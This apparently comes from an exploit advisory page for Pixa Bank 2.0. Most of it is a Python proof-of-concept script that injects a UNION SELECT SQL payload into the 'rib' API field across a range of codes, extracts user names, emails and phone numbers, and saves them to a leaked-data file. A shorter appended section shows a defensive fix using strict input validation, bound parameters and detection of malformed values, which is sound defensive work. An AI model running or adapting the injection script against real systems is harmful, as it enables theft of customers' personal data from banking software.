📄 Pixa Bank 2.0 SQL Injection

🗓️ 11 May 2026 00:00:00 | Reported by indoushka | Type: packetstorm | 🔗 packetstorm.news

A Python tool that tests an API for SQL injection, extracts user data from the database, saves the results to a file, and includes a validation mode.

Code
==================================================================================================================================
    | # Title     : Pixa Bank 2.0 – API SQL Injection                                                                                |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://pixastudio.com/                                                                                          |
    ==================================================================================================================================
    
    [+] Summary    : This Python script is used to test and extract data from an API by repeatedly sending requests containing SQL injection payloads into a numeric input field. 
                     It attempts to exploit a potential server vulnerability to extract user information such as name, email address, and phone number from the database.
                     If the query is successful, the extracted data is displayed and saved to a local text file. 
                     It also includes an additional validation mode to send normal requests and detect valid code within the system.
    
    [+] POC   :  
    
    
    import requests
    import urllib3
    import json

    # Silence the TLS warning that verify=False would otherwise print
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    URL = "https://127.0.0.1/api/agence-ajax.php"
    HEADERS = {
        'X-Requested-With': 'XMLHttpRequest',
        'User-Agent': 'Mozilla/5.0 indoushka_CORE'
    }

    def indoushka_miner():
        print("[*] Starting the comprehensive data extraction process (indoushka version)...")
        print("-" * 60)

        for code in range(400, 900):
            # Injection string placed in the numeric 'rib' field
            sql_payload = f"{code}' UNION SELECT GROUP_CONCAT(nom, 0x7c, email, 0x7c, tel) FROM users-- -"

            try:
                res = requests.post(URL, headers=HEADERS, data={'rib': sql_payload}, verify=False, timeout=5)

                if res.status_code == 200:
                    data = res.json()

                    if data.get("error") == "N" and data.get("agence"):
                        extracted_info = data.get("agence")
                        print(f"[!] Data extracted from {code}:")
                        print(f" => {extracted_info}")

                        with open("indoushka_leaked_data.txt", "a", encoding="utf-8") as f:
                            f.write(f"Code {code}: {extracted_info}\n")
                    else:
                        # Validation mode: send a normal, well-formed value for this code
                        normal_rib = f"00100{code:03d}030030018036"
                        res_normal = requests.post(URL, headers=HEADERS, data={'rib': normal_rib}, verify=False)
                        if res_normal.json().get("error") == "N":
                            print(f"[+] Normal Agency Revealed: {code} | {res_normal.json().get('agence')}")

            except Exception:
                # Any request or JSON error: skip this code
                continue

    if __name__ == "__main__":
        indoushka_miner()
    
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
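
For defenders, the fix for the `rib` parameter is strict input validation followed by a bound-parameter query. The sketch below is an added example, not code from the advisory or from Pixa Bank. Its assumptions: the 20-digit `rib` format is inferred from the PoC's normal request, and the `agences` table, the agency-code position, the function names and the SQLite stand-in database are all hypothetical.

```python
import re
import sqlite3

# Assumption: a legitimate `rib` is exactly 20 ASCII digits, the shape of the
# "normal" value the PoC sends. Adjust to the application's real format.
RIB_RE = re.compile(r"[0-9]{20}")

# Constructed sample inputs: the PoC's two request shapes for code 412.
NORMAL_RIB = "00100412030030018036"
INJECTED_RIB = ("412' UNION SELECT GROUP_CONCAT(nom, 0x7c, email, 0x7c, tel) "
                "FROM users-- -")


def make_demo_db():
    """In-memory stand-in for the real database (constructed schema and rows)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE agences (code TEXT PRIMARY KEY, nom TEXT);
        CREATE TABLE users (nom TEXT, email TEXT, tel TEXT);
        INSERT INTO agences VALUES ('412', 'Agence Centre');
        INSERT INTO users VALUES ('Test User', 'user@example.test', '0000000000');
    """)
    return db


def lookup_agence(db, code):
    """Bound parameter: `code` is always data, never parsed as SQL."""
    row = db.execute("SELECT nom FROM agences WHERE code = ?", (code,)).fetchone()
    return row[0] if row else None


def handle_rib(db, rib):
    """Validate first, then query; returns the error/agence shape the PoC reads."""
    # fullmatch() rejects quotes, spaces, comments and trailing newlines alike.
    if not isinstance(rib, str) or not RIB_RE.fullmatch(rib):
        return {"error": "Y", "agence": None}
    agence = lookup_agence(db, rib[5:8])  # hypothetical: digits 6-8 = agency code
    return {"error": "N" if agence else "Y", "agence": agence}


def flag_rejected(rib_values):
    """Detection side: every non-conforming `rib` is worth logging and alerting on."""
    return [v for v in rib_values if not RIB_RE.fullmatch(v)]
```

Either control alone blocks the request shown in the PoC; keeping both means a later loosening of the format check does not reopen the query.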
